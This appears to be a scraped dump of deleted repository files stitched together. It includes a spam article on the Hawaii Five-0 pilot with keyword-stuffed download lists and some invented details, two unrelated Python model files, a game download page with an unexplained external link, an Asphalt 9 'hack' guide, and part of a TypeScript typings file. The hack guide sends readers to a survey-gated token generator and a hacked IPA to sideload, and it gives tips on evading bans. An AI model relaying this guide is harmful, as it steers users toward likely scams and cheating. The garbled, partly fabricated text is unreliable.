    The pilot episode begins with Steve McGarrett arriving in Hawaii to attend his father's funeral. He is greeted by Danny Williams, who informs him that his father was killed by Victor Hesse (James Marsters), a notorious arms dealer who was seeking revenge for Steve's role in killing his brother Anton (Norman Reedus). Steve vows to find Hesse and bring him to justice, but he is interrupted by Governor Jameson, who offers him a job as the head of a new task force that will have no red tape or bureaucracy. Steve initially declines, but he changes his mind when he learns that Danny is assigned to investigate his father's murder.

    -

    Steve recruits Chin Ho Kelly, an old friend of his father who was forced to resign from the HPD after being framed for stealing money from an evidence locker. Chin suggests that they also hire Kono Kalakaua, his cousin who just graduated from the police academy. Together, they track down Hesse's location using clues left by Steve's father in a toolbox. They find Hesse holding a hostage, who turns out to be Steve's sister Mary Ann (Taryn Manning). Steve manages to rescue Mary Ann and shoot Hesse, but not before Hesse reveals that he was working for someone else, a mysterious figure known as Wo Fat (Mark Dacascos).

    -

    The episode ends with Steve accepting Governor Jameson's offer and naming his team "Five-0", after his father's old police badge number. He also tells Danny to "book 'em, Danno", a catchphrase that was used by the original Hawaii Five-O characters.

    -

    Why should you watch Hawaii Five-0 Season 1 Episode 1?

    -

    There are many reasons why you should watch Hawaii Five-0 Season 1 Episode 1, whether you are a fan of the original series or not. Here are some of them:

    -
      -
    • The pilot episode is packed with action and suspense, from car chases to shootouts to explosions. You will be on the edge of your seat as you watch the Five-0 team take on Hesse and his henchmen.
    • -
    • The pilot episode showcases the beautiful scenery and culture of Hawaii, from the stunning beaches to the lush mountains to the vibrant city. You will feel like you are on a tropical vacation as you watch the Five-0 team explore the island.
    • -
    • The pilot episode introduces the main characters and their personalities, as well as their chemistry and banter. You will get to know and love Steve, Danny, Chin, and Kono, as well as their strengths and weaknesses, their backgrounds and motivations, and their relationships and conflicts.
    • -
    • The pilot episode sets up the main arc and mystery of the series, which is the identity and agenda of Wo Fat, the elusive mastermind behind Hesse's actions. You will be intrigued and curious as you watch the Five-0 team uncover clues and face dangers related to Wo Fat.
    • -
    • The pilot episode ends with a cliffhanger that will make you want to watch more. You will be hooked and eager to find out what happens next, as well as how the Five-0 team will evolve and grow throughout the series.
    • -
    -

    Where can you watch Hawaii Five-0 Season 1 Episode 1?

    -

    If you are interested in watching Hawaii Five-0 Season 1 Episode 1, you have several options to choose from. Here are some of them:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Who are the cast and crew of Hawaii Five-0 Season 1 Episode 1?

    -

    Hawaii Five-0 Season 1 Episode 1 features a talented and diverse cast and crew who bring the story and the characters to life. Here is a table with the names and roles of some of the actors and directors who worked on the episode:

    -

    hawaii five-o 1968 full fathom five download
    -hawaii five-0 strangers in our own land free download
    -hawaii five-o tiger by the tail streaming online
    -hawaii five-0 samurai episode 1 download
    -hawaii five-o and they painted daisies on his coffin free streaming
    -hawaii 5-o twenty four carat kill download
    -hawaii five-0 the ways of love episode 1 streaming
    -hawaii 5-o no blue skies free download
    -hawaii five-o by the numbers episode 1 download
    -hawaii 5-o yesterday died and tomorrow won't be born streaming
    -hawaii five-o deathwatch free download
    -hawaii 5-o pray love remember episode 1 download
    -hawaii five-o king of the hill streaming online
    -hawaii 5-o up tight free download
    -hawaii five-o face of the dragon episode 1 download
    -hawaii 5-o the box streaming online
    -hawaii five-o one for the money free download
    -hawaii five-o along came joey episode 1 download
    -hawaii 5-o once upon a time part 1 streaming online
    -hawaii five-o once upon a time part 2 free download
    -hawaii 5-o not that much different episode 1 download
    -hawaii five-o six kilos streaming online
    -hawaii 5-o the big kahuna free download
    -hawaii five-o cocoon part 1 episode 1 download
    -hawaii five-o cocoon part 2 streaming online
    -watch hawaii five-0 pilot episode online free
    -stream hawaii five-0 ohana episode online hd
    -download hawaii five-0 malama ka aina episode hd
    -watch hawaii five-0 lanakila episode online free
    -stream hawaii five-0 nalowale episode online hd
    -download hawaii five-0 ko'olauloa episode hd
    -watch hawaii five-0 ho'apono episode online free
    -stream hawaii five-0 mana'o episode online hd
    -download hawaii five-0 po'ipu episode hd
    -watch hawaii five-0 heihei episode online free
    -stream hawaii five-0 palekaiko episode online hd
    -download hawaii five-0 hahaione episode hd
    -watch hawaii five-0 ke kinohi episode online free
    -stream hawaii five-0 e malama episode online hd
    -download hawaii five-0 powa maka moana episode hd
    -watch hawaii five-0 loa aloha episode online free
    -stream hawaii five-0 nei'e nei'e episode online hd
    -download hawaii five-0 e ho'i na keiki oki uaua o na pali episode hd

    -
| Platform | Availability | Price |
| --- | --- | --- |
| CBS All Access | All seasons and episodes | $5.99/month with ads or $9.99/month without ads |
| Netflix | Seasons 1 to 8 | $8.99/month for basic plan or $13.99/month for standard plan or $17.99/month for premium plan |
| Amazon Prime Video | All seasons and episodes | $2.99/episode or $19.99/season or free with CBS All Access add-on |
| Hulu | All seasons and episodes | $5.99/month with ads or $11.99/month without ads or free with CBS All Access add-on |
| iTunes | All seasons and episodes | $2.99/episode or $19.99/season |
| Vudu | All seasons and episodes | $1.99/episode or $14.99/season |
| YouTube | All seasons and episodes | $1.99/episode or $14.99/season |
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    What are some trivia and fun facts about Hawaii Five-0 Season 1 Episode 1?

    -

    Hawaii Five-0 Season 1 Episode 1 is not only an entertaining and exciting watch, but also a fascinating and informative one. Here are some trivia and fun facts that you might not know about the episode:

    -
      -
    • The pilot episode was filmed in Oahu, Hawaii, in March 2010. It took 15 days to shoot and cost $8 million to produce.
    • -
    • The pilot episode features a cameo appearance by Al Harrington, who played Detective Ben Kokua in the original Hawaii Five-O series. He plays Mamo Kahike, a friend of Steve's father who runs a surf shop.
    • -
    • The pilot episode pays homage to the original Hawaii Five-O series in several ways, such as using the same theme song, opening credits, catchphrase, and locations. For example, the Iolani Palace, which served as the headquarters of the Five-O team in the original series, is also used as the Governor's office in the rebooted series.
    • -
    • The pilot episode was dedicated to the memory of Leonard Freeman, the creator of the original Hawaii Five-O series, who died in 1974. His name appears on Steve's father's tombstone in the opening scene.
    • -
    • The pilot episode received positive reviews from critics and audiences alike. It scored a 7.6/10 rating on IMDb, a 74% approval rating on Rotten Tomatoes, and a 66/100 score on Metacritic. It also attracted 14.2 million viewers on its premiere night, making it the most-watched new show of the fall season.
    • -

      Conclusion

      -

      Hawaii Five-0 Season 1 Episode 1 is a thrilling start to a new series that combines action, drama, humor, and romance. It introduces the main characters and their mission, as well as the main villain and his plot. It also showcases the beauty and culture of Hawaii, as well as the legacy and influence of the original Hawaii Five-O series. If you are looking for a new show to watch, you should definitely give Hawaii Five-0 Season 1 Episode 1 a try. You will not regret it.

      -

      FAQs

      -

      Here are some frequently asked questions and answers about Hawaii Five-0 Season 1 Episode 1:

      -
        -
      1. Is Hawaii Five-0 based on a true story?
      2. -

        No, Hawaii Five-0 is not based on a true story. It is a fictional show that follows an elite task force that investigates crimes on the Hawaiian islands. However, some of the cases and characters are inspired by real-life events and people.

        -
      3. How many seasons and episodes are there in Hawaii Five-0?
      4. -

        Hawaii Five-0 ran for 10 seasons and 240 episodes from 2010 to 2020. The final episode aired on April 3, 2020. The show was cancelled due to the departure of Alex O'Loughlin, who played Steve McGarrett.

        -
      5. What is the meaning of the title Hawaii Five-0?
      6. -

        The title Hawaii Five-0 has two meanings. One is that it refers to the name of the task force that investigates crimes on the Hawaiian islands. The other is that it is a pun on the name of the state of Hawaii, which is the 50th state to join the United States of America.

        -
      7. What is the difference between Hawaii Five-0 and Hawaii Five-O?
      8. -

        The difference between Hawaii Five-0 and Hawaii Five-O is that the former is the name of the rebooted series that started in 2010, while the latter is the name of the original series that ran from 1968 to 1980. The rebooted series uses a zero instead of a letter O in its title to distinguish itself from the original series.

        -
      9. Who sings the theme song of Hawaii Five-0?
      10. -

        The theme song of Hawaii Five-0 is a re-recorded version of the original Hawaii Five-O theme song, which was composed by Morton Stevens and performed by The Ventures. The re-recorded version was performed by Brian Tyler and Keith Power, who also composed the original music for the rebooted series.


        197e85843d
        -
        -
\ No newline at end of file
diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py
deleted file mode 100644
index 1b04c7e94fd5e2dfaa580174b37356f19ce1a5e1..0000000000000000000000000000000000000000
--- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/encoder4editing/__init__.py
+++ /dev/null
@@ -1,15 +0,0 @@
-from .utils.model_utils import setup_model
-
-
-def get_latents(net, x, is_cars=False):
-    codes = net.encoder(x)
-    if net.opts.start_from_latent_avg:
-        if codes.ndim == 2:
-            codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)[:, 0, :]
-        else:
-            codes = codes + net.latent_avg.repeat(codes.shape[0], 1, 1)
-    if codes.shape[1] == 18 and is_cars:
-        codes = codes[:, :16, :]
-    return codes
-
-
diff --git a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py b/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py
deleted file mode 100644
index f7803dad0d8c34bc93fc9e80b3b9fea200bf0c78..0000000000000000000000000000000000000000
--- a/spaces/feng2022/Time-TravelRephotography/Time_TravelRephotography/models/gaussian_smoothing.py
+++ /dev/null
@@ -1,74 +0,0 @@
-import math
-import numbers
-import torch
-from torch import nn
-from torch.nn import functional as F
-
-
-class GaussianSmoothing(nn.Module):
-    """
-    Apply gaussian smoothing on a
-    1d, 2d or 3d tensor. Filtering is performed seperately for each channel
-    in the input using a depthwise convolution.
-    Arguments:
-        channels (int, sequence): Number of channels of the input tensors. Output will
-            have this number of channels as well.
-        kernel_size (int, sequence): Size of the gaussian kernel.
-        sigma (float, sequence): Standard deviation of the gaussian kernel.
-        dim (int, optional): The number of dimensions of the data.
-            Default value is 2 (spatial).
-    """
-    def __init__(self, channels, kernel_size, sigma, dim=2):
-        super(GaussianSmoothing, self).__init__()
-        if isinstance(kernel_size, numbers.Number):
-            kernel_size = [kernel_size] * dim
-        if isinstance(sigma, numbers.Number):
-            sigma = [sigma] * dim
-
-        # The gaussian kernel is the product of the
-        # gaussian function of each dimension.
-        kernel = 1
-        meshgrids = torch.meshgrid(
-            [
-                torch.arange(size, dtype=torch.float32)
-                for size in kernel_size
-            ]
-        )
-        for size, std, mgrid in zip(kernel_size, sigma, meshgrids):
-            mean = (size - 1) / 2
-            kernel *= 1 / (std * math.sqrt(2 * math.pi)) * \
-                      torch.exp(-((mgrid - mean) / (2 * std)) ** 2)
-
-        # Make sure sum of values in gaussian kernel equals 1.
-        kernel = kernel / torch.sum(kernel)
-
-        # Reshape to depthwise convolutional weight
-        kernel = kernel.view(1, 1, *kernel.size())
-        kernel = kernel.repeat(channels, *[1] * (kernel.dim() - 1))
-
-        self.register_buffer('weight', kernel)
-        self.groups = channels
-
-        if dim == 1:
-            self.conv = F.conv1d
-        elif dim == 2:
-            self.conv = F.conv2d
-        elif dim == 3:
-            self.conv = F.conv3d
-        else:
-            raise RuntimeError(
-                'Only 1, 2 and 3 dimensions are supported. Received {}.'.format(dim)
-            )
-
-    def forward(self, input, stride: int = 1):
-        """
-        Apply gaussian filter to input.
-        Arguments:
-            input (torch.Tensor): Input to apply gaussian filter on.
-            stride for applying conv
-        Returns:
-            filtered (torch.Tensor): Filtered output.
- """ - padding = (self.weight.shape[-1] - 1) // 2 - return self.conv(input, weight=self.weight, groups=self.groups, padding=padding, stride=stride) - diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md deleted file mode 100644 index a8403b27655eaa8b19b91003709581c554a296b8..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/ .md +++ /dev/null @@ -1,52 +0,0 @@ -
        -

        Download Black Rush: A Mobile Online Game About The Criminal World Of Russia

        -

        Do you love action-packed games that let you experience the thrill and danger of living in a criminal world? Do you want to drive fast cars, fight with rival gangs, earn money from illegal jobs, and explore a realistic and dynamic environment? If you answered yes to any of these questions, then you should download Black Rush - a mobile online game that is based on the criminal world of Russia.

        -

download Black Rush (скачать блек раша)


        Download File ☆☆☆☆☆ https://gohhs.com/2uPvke



        -

        What Is Black Rush?

        -

Black Rush is an online game that was developed by Black Russia Studio and released in 2020. The game is inspired by the popular Criminal Russia Multiplayer
        (CRMP) games, which are multiplayer modifications of GTA: San Andreas that recreate the atmosphere of Russia in the 90s. The game features realistic graphics and sound effects, dynamic and immersive environment, social and competitive features, and more. You can choose your car, character, job, and gang, and start your own criminal career in the game. You can also interact with other players, join voice and text chat, participate in events, and collect magnetite for extra rewards. The game is available on VKontakte, a popular social media platform in Russia that has over 500 million users. You can download the game for free from the official VK page of Black Russia Studio, or from the Google Play Store. The game is compatible with Android devices and has a rating of 4.5 out of 5 stars based on over 13,000 reviews.

        -

        How To Download Black Rush?

        -

        Downloading Black Rush is easy and fast. You can choose one of the following methods to download the game:

        -
          -
        • Download from VKontakte: If you have a VK account, you can go to the official VK page of Black Russia Studio and click on the "Play" button. This will open the game in your browser or in the VK app if you have it installed. You can also scan the QR code on the page with your phone camera to open the game directly.
        • -
        • Download from Google Play Store: If you prefer to download the game from the Google Play Store, you can search for "Black Rush" or use this link: [text](^10^). This will take you to the game page where you can click on the "Install" button to download and install the game on your device.
        • -
        -

        After downloading the game, you can launch it from your device's home screen or app drawer. You will need to create an account or log in with your VK account to start playing. You can also customize your settings, such as language, graphics, sound, and sensitivity, from the game menu.

        -

        How To Play Black Rush?

        -

        Playing Black Rush is fun and exciting. You can explore and interact with the realistic and dynamic environment of Russia in the 90s, drive hundreds of unique cars, fight with rival gangs, earn money from illegal jobs, and more. Here are some of the things you can do in the game:

        -

        Choose Your Car

        -

        The game offers a wide range of cars to choose from, both domestic and foreign. You can find cars from brands such as Lada, Volga, Moskvich, UAZ, VAZ, BMW, Mercedes-Benz, Audi, Toyota, Nissan, and more. You can also customize your car with different parts, such as wheels, spoilers, bumpers, neon lights, vinyls, and more. You can buy new cars or upgrade your existing ones with money that you earn in the game.

        -

        Choose Your Character

        -

        The game also offers a variety of characters to choose from, each with their own appearance and personality. You can find characters such as gangsters, cops, businessmen, students, workers, celebrities, and more. You can also customize your character with different clothes, accessories, tattoos, hairstyles, and more. You can buy new clothes or change your appearance with money that you earn in the game.

        -

        Choose Your Job

        -

        The game also offers a variety of jobs to choose from, each with their own rewards and risks. You can find jobs such as taxi driver, courier, mechanic, hacker, dealer, robber, hitman, and more. You can also create your own jobs or accept jobs from other players. You can earn money or items from completing jobs in the game.

        -

        Choose Your Gang

        -

        The game also offers a variety of gangs to choose from or join, each with their own territory and reputation. You can find gangs such as Bratva (Russian Mafia), OMON (Special Police Force), Bandits (Street Thugs), Rappers (Hip Hop Artists), Bikers (Motorcycle Riders), Skinheads (Neo-Nazis), and more. You can also create your own gang or join a gang created by other players. You can fight with rival gangs or cooperate with allied gangs in the game.

        -

        Why Play Black Rush?

        -

        There are many reasons why you should play Black Rush. Here are some of them:

        -

        -

        Realistic Graphics And Sound Effects

        -

        The game has realistic graphics and sound effects that create a sense of immersion and realism. The game uses high-quality models and textures for cars and buildings that reflect the style and culture of Russia in the 90s. The game also uses realistic sound effects for cars and weapons that match the real ones. The game also has a dynamic weather system and day and night cycle that affect the visibility and atmosphere of the game.

        -

        Dynamic And Immersive Environment

        -

        The game has a dynamic and immersive environment that allows you to explore and interact with various elements. The game has a large map that covers different regions of Russia, such as Moscow, St. Petersburg, Siberia, Chechnya, and more. The game also has different types of buildings, such as apartments, offices, shops, clubs, warehouses, factories, and more. The game also has different types of objects, such as traffic lights, vending machines, ATMs, phones, radios, TVs, and more. The game also has different types of NPCs, such as pedestrians, drivers, cops, gangsters, animals, and more. The game also has different types of events, such as car chases, shootouts, robberies, races, concerts, and more.

        -

        Social And Competitive Features

        -

        The game has social and competitive features that allow you to communicate and compete with other players. The game has a voice and text chat system that lets you talk to other players in real time. The game also has a friend and enemy system that lets you add or block other players. The game also has a ranking and reputation system that lets you see your progress and status in the game. The game also has a clan and alliance system that lets you join or create groups of players with common goals and interests. The game also has a PvP and PvE system that lets you fight or cooperate with other players in different modes and scenarios.

        -

        Tips And Tricks For Playing Black Rush

        -

        If you want to play Black Rush better and have more fun, here are some tips and tricks that you can use:

        -

        Use Headphones For Better Immersion

        -

        If you want to have a better immersion and sound quality, you should use headphones when playing Black Rush. This will help you hear the sound effects more clearly and feel the atmosphere more intensely. You will also be able to hear the voice chat more easily and communicate with other players more effectively.

        -

        Adjust Your Sensitivity Settings For Better Control

        -

        If you want to have a better control over your car and character, you should adjust your sensitivity settings in the game menu. This will help you steer your car more smoothly and aim your weapon more accurately. You can also customize your controls for different actions, such as driving, shooting, jumping, crouching, and more.

        -

        Collect Magnetite For Extra Rewards

        -

        If you want to have extra rewards such as money and items, you should collect magnetite in the game. Magnetite is a rare mineral that can be found in various places in the game world. You can use a magnetometer to detect magnetite nearby and collect it with a magnetizer. You can then exchange magnetite for money or items at special shops or terminals in the game.

        -

        Conclusion

        -

        Black Rush is a mobile online game that is based on the criminal world of Russia. It is a fun and exciting game that lets you experience the thrill and danger of living in a criminal world. You can download the game for free from VKontakte or Google Play Store and start playing right away. You can choose your car, character, job, and gang, and start your own criminal career in the game. You can also explore and interact with the realistic and dynamic environment of Russia in the 90s, drive hundreds of unique cars, fight with rival gangs, earn money from illegal jobs, and more. You can also communicate and compete with other players, join or create clans and alliances, participate in events, and collect magnetite for extra rewards. If you love action-packed games that let you experience the thrill and danger of living in a criminal world, then you should download Black Rush today and join the millions of players who are already enjoying the game.

        -

        Here are some FAQs about Black Rush:

        -
          -
        • Q: Is Black Rush free to play? A: Yes, Black Rush is free to play. You can download the game for free from VKontakte or Google Play Store. You can also play the game without spending any real money. However, you can buy optional items or services with real money if you want to enhance your gameplay experience.
        • -
        • Q: Is Black Rush safe to play? A: Yes, Black Rush is safe to play. The game does not contain any viruses or malware that can harm your device or data. The game also does not require any personal information or permissions that can compromise your privacy or security. However, you should be careful when playing online with other players, as some of them may use inappropriate language or behavior. You can report or block any players who violate the game rules or terms of service.
        • -
        • Q: Is Black Rush available in other languages? A: Yes, Black Rush is available in other languages. The game supports Russian, English, and Turkish languages. You can change the language of the game from the game menu. However, some of the content or features of the game may not be fully translated or localized in some languages.
        • -
        • Q: Is Black Rush compatible with my device? A: Black Rush is compatible with most Android devices that have at least 2 GB of RAM and Android 4.4 or higher. However, some devices may not be able to run the game smoothly or properly due to different specifications or performance issues. You can check the compatibility of your device from the game page on VKontakte or Google Play Store.
        • -
        • Q: How can I contact the developers of Black Rush? A: You can contact the developers of Black Rush by using the feedback form on the official VK page of Black Russia Studio. You can also follow the page for the latest news and updates about the game. You can also join the official VK group of Black Rush, where you can chat with other players and developers, share your feedback and suggestions, participate in polls and contests, and more.
        • -

        197e85843d
        -
        -
        \ No newline at end of file diff --git a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md b/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md deleted file mode 100644 index b2ebc6bcb9a90f86f5e21fe523386dd486846779..0000000000000000000000000000000000000000 --- a/spaces/feregVcuzo/sanity-test-midi/checkpoint/Asphalt 9 Legends Hack - How to Get Unlimited Tokens and Credits on iOS Devices.md +++ /dev/null @@ -1,102 +0,0 @@ -
        - -
        Actor | Role
        Alex O'Loughlin | Steve McGarrett
        Scott Caan | Danny Williams
        Daniel Dae Kim | Chin Ho Kelly
        Grace Park | Kono Kalakaua
        Jean Smart | Pat Jameson
        James Marsters | Victor Hesse
        Taryn Manning | Mary Ann McGarrett
        Mark Dacascos | Wo Fat
        Director | Credit
        Len Wiseman | Directed the pilot episode
    
    - - - -
    -

    Asphalt 9 Legends Hack: How to Download and Use It on iOS

    -

    Introduction

    -

    Asphalt 9 Legends is one of the most popular racing games on mobile devices. It offers stunning graphics, realistic physics, and thrilling gameplay. You can choose from more than 100 cars from famous brands like Ferrari, Lamborghini, Porsche, and more. You can also customize your cars and upgrade them to suit your style and preferences. You can race in different modes and locations, such as career mode, multiplayer mode, events mode, and exotic places like Cairo, Shanghai, Rome, and more.

    -

        However, Asphalt 9 Legends is not an easy game to master. You need a lot of skill, patience, and resources to progress. You need to earn tokens and credits, the game's main currencies, to buy new cars, upgrade them, and unlock new features. You also have to compete with players from around the world who may have better cars and more experience than you, so you may find yourself stuck on a certain level or mode, or simply frustrated by the game's difficulty.
    

    -

    asphalt 9 legends hack download ios


    Downloadhttps://gohhs.com/2uPtyi



    -

        That's why many players look for a way to hack Asphalt 9 Legends and get unlimited tokens and credits. With a hack, you can enjoy the game without limitations: buy any car you want, upgrade it to the maximum level, and dominate the races. You can also unlock all of the game's features and modes, and save both time and money, since you no longer need to spend hours grinding or pay real cash for tokens and credits.
    

    -

    So, how can you hack Asphalt 9 Legends on iOS? What are the features of Asphalt 9 Legends hack? And how can you use it safely and effectively? In this article, we will answer all these questions and more. We will show you two methods to download and use Asphalt 9 Legends hack on iOS devices. We will also give you some tips and tricks for using the hack. So, let's get started!

    -

    How to Download Asphalt 9 Legends Hack on iOS

    -

        There are two methods to download the Asphalt 9 Legends hack on iOS devices. The first uses the NovaGames website, an online generator that gives you unlimited tokens and credits for free. The second uses the Archive.org website, a web archive that provides a hacked IPA file you can install on your device with Cydia Impactor or AltStore. We explain both methods in detail below.
    

    -

    Method 1: Using NovaGames Website

    -

        The NovaGames website is one of the best sources for the Asphalt 9 Legends hack on iOS devices. It is an online generator that gives you unlimited tokens and credits for free. You don't need to download anything or jailbreak your device to use it; all you need is a stable internet connection and a few minutes of your time. Here are the steps to use the NovaGames website:
    

    -
      -
    1. Go to NovaGames website using your device's browser.
    2. -
    3. Enter your Asphalt 9 Legends username or email in the required field.
    4. -
    5. Select your device platform (iOS) and region (US).
    6. -
    7. Choose the amount of tokens and credits you want to generate (up to 999999).
    8. -
    9. Click on the "Generate Now" button and wait for the process to complete.
    10. -
    11. You may need to verify your device by completing a short survey or offer. This is to prevent bots and abuse of the service.
    12. -
    13. Once you complete the verification, you will receive your tokens and credits in your game account within a few minutes.
    14. -
    15. Enjoy the game with unlimited resources!
    16. -
    -

    Method 2: Using Archive.org Website

    -

        The Archive.org website is another source for the Asphalt 9 Legends hack on iOS devices. It is a web archive that provides a hacked IPA file you can install on your device with Cydia Impactor or AltStore. You need to jailbreak your device or use a sideloading app for this method. Here are the steps to use the Archive.org website:
    

    -
      -
    1. Go to Archive.org website using your device's browser.
    2. -
    3. Search for "Asphalt 9 Legends Hack IPA" in the search bar.
    4. -
    5. Select the latest version of the hacked IPA file from the results.
    6. -
    7. Download the hacked IPA file to your device.
    8. -
    9. Install the hacked IPA file using Cydia Impactor or AltStore.
    10. -
    11. Cydia Impactor is a tool that can install IPA files on iOS devices using a computer. You need to have iTunes installed on your computer and connect your device with a USB cable. You also need to enter your Apple ID and password when prompted by Cydia Impactor.
    12. -
    13. AltStore is an app that can install IPA files on iOS devices without a computer. You need to download AltStore app from its official website and install it on your device. You also need to trust the app in your device settings and refresh it every 7 days.
    14. -
    15. Launch the game with the hack enabled. You will see a menu with various options to modify the game, such as unlimited tokens, credits, nitro, speed, and more.
    16. -
    17. Enjoy the game with the hack!
    18. -
    -

    How to Use Asphalt 9 Legends Hack on iOS

    -

    Now that you have downloaded and installed Asphalt 9 Legends hack on your iOS device, you may wonder how to use it effectively and safely. Here are some tips and tricks for using the hack:

    -

    Tips and Tricks for Using the Hack

    -
      -
    • Customize your cars and unlock new ones with the hack. You can use the unlimited tokens and credits to buy any car you want, from the common ones to the legendary ones. You can also upgrade your cars to the max level and enhance their performance and appearance. You can also unlock new cars by completing certain achievements or events with the hack.
    • -
    • Compete in multiplayer mode and win races with the hack. You can use the hack to boost your speed, nitro, and acceleration in multiplayer mode. You can also disable traffic, collisions, and cops to make your races easier. You can also choose any track and mode you want with the hack. You can win more races and climb up the leaderboard with the hack.
    • -
    • Avoid getting banned by Gameloft with the hack. Gameloft is the developer of Asphalt 9 Legends, and they may detect and ban players who use hacks or cheats in their game. To avoid getting banned, you should use the hack sparingly and wisely. Don't use it too often or too blatantly. Don't generate too many tokens and credits at once. Don't win every race by a large margin. Don't brag about using the hack in chat or social media. Be smart and discreet when using the hack.
    • -
    -

    Conclusion

    -

    Asphalt 9 Legends is a fun and exciting racing game that you can enjoy on your iOS device. However, it can also be challenging and frustrating at times, especially if you don't have enough resources or skills to progress in the game. That's why using a hack for Asphalt 9 Legends can be a great solution for you. You can get unlimited tokens and credits for free, and use them to buy, upgrade, and unlock new cars. You can also modify the game settings and features to make your races easier and more enjoyable. You can also compete in multiplayer mode and win more races with the hack.

    -

    In this article, we showed you two methods to download and use Asphalt 9 Legends hack on iOS devices. The first method is using NovaGames website, which is an online generator that can give you unlimited tokens and credits for free. The second method is using Archive.org website, which is a web archive that can provide you with a hacked IPA file that you can install on your device using Cydia Impactor or AltStore. We also gave you some tips and tricks for using the hack effectively and safely.

    -

    asphalt 9 legends cheats ios no jailbreak
    -asphalt 9 legends mod apk download for iphone
    -asphalt 9 legends unlimited tokens and credits hack ios
    -asphalt 9 legends free hack tool online generator ios
    -asphalt 9 legends ipa file hacked by iosgods.com
    -asphalt 9 legends hack without human verification ios
    -asphalt 9 legends cheat codes for iphone and ipad
    -asphalt 9 legends hack app download ios
    -asphalt 9 legends hack version download for ios
    -asphalt 9 legends hack no survey no password ios
    -asphalt 9 legends hack cydia tweak ios
    -asphalt 9 legends hack with lucky patcher ios
    -asphalt 9 legends hack using ifunbox ios
    -asphalt 9 legends hack reddit ios
    -asphalt 9 legends hack youtube video ios
    -asphalt 9 legends hack easy and fast ios
    -asphalt 9 legends hack working 100% ios
    -asphalt 9 legends hack safe and secure ios
    -asphalt 9 legends hack latest update ios
    -asphalt 9 legends hack best tips and tricks ios
    -asphalt 9 legends hack how to get free cars ios
    -asphalt 9 legends hack unlock all tracks and modes ios
    -asphalt 9 legends hack unlimited nitro and speed ios
    -asphalt 9 legends hack customize your car ios
    -asphalt 9 legends hack multiplayer mode ios
    -asphalt 9 legends hack offline mode ios
    -asphalt 9 legends hack no root or jailbreak required ios
    -asphalt 9 legends hack support all devices and platforms ios
    -asphalt 9 legends hack novagames.org review ios
    -asphalt 9 legends hack megatut.com guide ios

    -

    We hope you found this article helpful and informative. If you want to try out Asphalt 9 Legends hack on your iOS device, we invite you to visit NovaGames website and follow their instructions. You will be amazed by how much fun and excitement you can have with Asphalt 9 Legends hack.

    -

    Thank you for reading this article. Please share your feedback and comments below. And don't forget to share this article with your friends who may also be interested in Asphalt 9 Legends hack.

    -

    FAQs

    -

    Here are some frequently asked questions about Asphalt 9 Legends hack:

    -
      -
    1. Is Asphalt 9 Legends hack safe to use?
    2. -
    3. Yes, it is safe to use as long as you follow the instructions and don't abuse it. NovaGames website uses encryption and proxy servers to protect your account from detection and ban. Archive.org website provides verified and tested IPA files that are free from viruses and malware.

    4. -
    5. Does Asphalt 9 Legends hack work on other platforms?
    6. -
    7. No, it only works on iOS devices. If you want to use it on Android or PC, you need to find another hack.

    8. -
    9. Do I need to jailbreak my device to use Asphalt 9 Legends hack?
    10. -
    11. No, you don't need to jailbreak your device to use NovaGames online generator. However, you need to jailbreak your device or use a sideloading app to install the hacked IPA file from Archive.org website.

    12. -
    13. How often do I need to update Asphalt 9 Legends hack?
    14. -
    15. You need to update Asphalt 9 Legends hack whenever there is a new version of the game available. You can check NovaGames website or Archive.org website for updates.

    16. -
    17. Where can I get more information about Asphalt 9 Legends hack?
    18. -
    19. You can get more information about Asphalt 9 Legends hack by visiting NovaGames website or contacting their support team. You can also read the reviews and comments of other users who have used the hack.

    20. -
    -
    -

    197e85843d
    -
    -
    \ No newline at end of file diff --git a/spaces/fffiloni/Image-Caption-2-Shap-E/README.md b/spaces/fffiloni/Image-Caption-2-Shap-E/README.md deleted file mode 100644 index 9db4d6ccd4163ce55701bb1b9022c3e7767c0560..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/Image-Caption-2-Shap-E/README.md +++ /dev/null @@ -1,17 +0,0 @@ ---- -title: Image Caption to Shap-E -emoji: 🧢 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.47.1 -python_version: 3.10.11 -app_file: app.py -pinned: false -license: mit -duplicated_from: hysts/Shap-E ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference - -https://arxiv.org/abs/2305.02463 \ No newline at end of file diff --git a/spaces/fffiloni/Music_Source_Separation/bytesep/dataset_creation/create_evaluation_audios/__init__.py b/spaces/fffiloni/Music_Source_Separation/bytesep/dataset_creation/create_evaluation_audios/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts b/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts deleted file mode 100644 index b9c1c3aa4f0d337eb151caf6ac77306ed739acb8..0000000000000000000000000000000000000000 --- a/spaces/fffiloni/controlnet-animation-doodle/node_modules/@types/node/ts4.8/dom-events.d.ts +++ /dev/null @@ -1,126 +0,0 @@ -export {}; // Don't export anything! - -//// DOM-like Events -// NB: The Event / EventTarget / EventListener implementations below were copied -// from lib.dom.d.ts, then edited to reflect Node's documentation at -// https://nodejs.org/api/events.html#class-eventtarget. -// Please read that link to understand important implementation differences. - -// This conditional type will be the existing global Event in a browser, or -// the copy below in a Node environment. -type __Event = typeof globalThis extends { onmessage: any, Event: any } -? {} -: 